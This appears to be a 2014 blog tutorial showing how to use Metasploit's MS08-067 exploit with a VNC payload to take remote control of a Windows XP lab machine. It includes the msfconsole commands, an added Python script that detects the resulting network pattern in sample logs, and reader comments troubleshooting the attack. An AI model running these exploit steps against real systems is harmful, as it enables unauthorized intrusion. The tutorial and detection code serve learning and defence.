Saturday, April 12, 2014

Hacking Windows : Totally own it - Hollywood Style

While real-life hacking and the movie version might seem far from congruent, there is at least some similarity. In this post, we'll get no shells, no meterpreter, no bullshit. We'll simply get the Windows XP desktop inside our Kali machine, as if we were actually sitting at it. What we're getting is going to look something like this:




If you have any difficulty understanding what's going on, that's because you skipped over 5 articles on penetration testing. You are recommended to go over the last 3 at least.

Starting metasploit

You must have Kali Linux installed; follow the link if you haven't got Kali Linux already.

After that, execute the following commands in a terminal to get Metasploit running:
service postgresql start
service metasploit start
msfconsole
After this, your Metasploit framework will start.

Information Gathering

  • Find IP of XP machine by running ipconfig on XP command prompt.
  • Find IP of Kali machine by running ifconfig on Kali terminal.

Hacking XP 

Now execute the following command (without the msf >, which is already there):
msf > use exploit/windows/smb/ms08_067_netapi
This selects the MS08-067 netapi exploit, which is well known for Windows XP. Now execute the following (everything before > will already be there):
msf  exploit(ms08_067_netapi) > set PAYLOAD windows/vncinject/bind_tcp 
Now run show options to see which values need to be filled in.
msf  exploit(ms08_067_netapi) > show options
You will need the information gathered in the Information Gathering step. Remember: XP is the remote host (RHOST). This is all we need. Just enter the XP machine's IP instead of 192.168.xxx.xxx:
msf  exploit(ms08_067_netapi) > set RHOST 192.168.xxx.xxx
That's all. Now type exploit and press Enter.
msf  exploit(ms08_067_netapi) > exploit
If everything goes right, you'll have a pretty much movie-style remote connection working for you, and you'll be able to work on the machine as you normally would if you had direct access to it.
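
From the defender's side, the steps above leave a recognisable network pattern: an allowed connection to the SMB port, followed shortly by a connection from the same source to a port the XP host does not normally serve, because a bind_tcp payload listens on the target. The Python below is an added example, not part of the original post; the log layout, the addresses, the baseline port set, TCP 445 as the SMB port and the 60-second window are all assumptions constructed for illustration.

```python
from datetime import datetime, timedelta

# Constructed sample events (not from the original post). Assumed layout:
# date time action proto src_ip dst_ip src_port dst_port
SAMPLE_LOG = """\
2014-04-12 10:00:01 ALLOW TCP 192.168.56.20 192.168.56.10 51000 139
2014-04-12 10:05:10 ALLOW TCP 192.168.56.30 192.168.56.10 49210 445
2014-04-12 10:05:12 ALLOW TCP 192.168.56.30 192.168.56.10 49211 8123
2014-04-12 10:20:00 ALLOW TCP 192.168.56.20 192.168.56.10 51002 445
2014-04-12 10:30:00 ALLOW TCP 192.168.56.20 192.168.56.10 51003 9000
2014-04-12 11:00:00 DROP TCP 192.168.56.40 192.168.56.10 50000 445
"""

SMB_PORT = 445
BASELINE_PORTS = {139, 445, 3389}   # assumed: ports this host normally serves
WINDOW = timedelta(seconds=60)      # assumed correlation window

def parse(line):
    """Split one log line into a dict; raises ValueError on malformed input."""
    date, time, action, proto, src, dst, _sport, dport = line.split()
    ts = datetime.strptime(f"{date} {time}", "%Y-%m-%d %H:%M:%S")
    return {"ts": ts, "action": action, "proto": proto,
            "src": src, "dst": dst, "dport": int(dport)}

def find_smb_followups(log_text, baseline=BASELINE_PORTS, window=WINDOW):
    """Return (src, dst, port, seconds_after_smb) for each allowed connection to
    a non-baseline port that follows an allowed SMB connection (same src, dst)."""
    last_smb = {}   # (src, dst) -> time of the latest allowed SMB connection
    alerts = []
    for line in log_text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        ev = parse(line)
        if ev["action"] != "ALLOW" or ev["proto"] != "TCP":
            continue    # dropped traffic never reached a listener
        key = (ev["src"], ev["dst"])
        if ev["dport"] == SMB_PORT:
            last_smb[key] = ev["ts"]
        elif ev["dport"] not in baseline and key in last_smb:
            delta = ev["ts"] - last_smb[key]
            if timedelta(0) <= delta <= window:
                alerts.append((ev["src"], ev["dst"], ev["dport"],
                               int(delta.total_seconds())))
    return alerts

if __name__ == "__main__":
    for alert in find_smb_followups(SAMPLE_LOG):
        print("suspicious follow-up connection:", alert)
```

On the constructed sample, only the 192.168.56.30 pair is flagged: the second source's follow-up falls outside the window, and the dropped connection from the third source is ignored.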

32 comments:

  1. Replies
    1. No known vulnerabilities in Windows 7. You'll have to attack the installed programs (Java/browsers/etc.)

  2. Take a look at the java exploitation in windows 8 tutorial. It's there on the homepage of the blog, I wrote it recently.

  3. hey mate it says attempting to trigger vulnerability
    and then it just stops at msf exploit(ms08_067_netapi and then i can only type

  4. Ty very much mate, I'll give it a shot today. I tried to hack into my laptop, which is XP, but it didn't work. I guess I will just install VMware Player and VMware Tools, then it will work :D.
    P.S.: This blog is awesome, you are an awesome teacher, thanks :D
    Replies
    1. Remember to install a very old version of XP, as the chances of being vulnerable to attacks are higher in old versions.
  5. Yeah, but then for vulnerability, in newer versions I need to target something like Java or that? Right?
  6. so so close this time but it says that the host is unreachable

    Replies
    1. Some problems with networking. If pinging the host fails then it means your virtual LAN is not configured properly. Try using NAT (it does the hard job for us and auto-configures everything)

  7. Yeah, I am using Windows 7. NAT won't work for some reason on VMware, neither would bridged.
    Replies
    1. Maybe your Windows XP firewall has a problem with the connection. Try disabling the firewall and try pinging again.

    2. Soon you will have to have a whole computer dedicated for kali linux. I am serious.

  8. It's just working on Windows XP WITHOUT Service Pack. Patched versions are NOT vulnerable for script kiddies like you
  9. This is the message I got after trying it - Exploit failed - unreachable : Rex: connection timeout.

  10. Can you present me any good books for beginner? :D

  11. for me there is no attack menu when i right click a host :/

    Replies
    1. oh sorry wrong tutorial :'D will post it again in the right one ^^


© Kali Tutorials, 2016. Unauthorized use and/or duplication of this material without express and written permission from this site’s author and/or owner is strictly prohibited. Excerpts and links may be used, provided that full and clear credit is given to Shashwat Chaudhary and Kali Tutorials with appropriate and specific direction to the original content.